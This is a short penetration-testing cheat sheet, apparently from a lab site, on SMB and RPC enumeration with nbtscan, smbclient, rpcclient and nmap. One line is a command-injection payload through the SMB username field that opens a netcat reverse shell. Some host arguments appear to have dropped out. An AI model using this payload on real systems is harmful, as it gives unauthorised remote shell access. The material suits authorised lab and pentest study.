Hooper Labs

SMB Enumeration


Get Hostname

nbtscan <ip-address>

Get Hostname of IP Range

nbtscan -r

Get Shares

smbclient -I <ip-address> -L <hostname>

Interact with Share

smbclient \\<ip-address>\share -U <user>

Command injection in SMB Username

smbclient -I -LMETASPLOITABLE -U"/=nohup mkfifo /tmp/p; nc 4444 0</tmp/p | /bin/sh >/tmp/p 2>&1; rm /tmp/p"

Mount Share (Windows)

net use \<target-ip>\share <password> /u:<username>

RPC Enumeration

rpcclient (null session)

rpcclient -U "" ip.addr

Get RPC Info from a List of Servers

nmap -sV -p 111 --script=rpcinfo

List all Groups


Query a Group

querygroup 0x44f

Query Member of Group

querygroupmem 0x44f

Query Users


Query a User

queryuser 0x451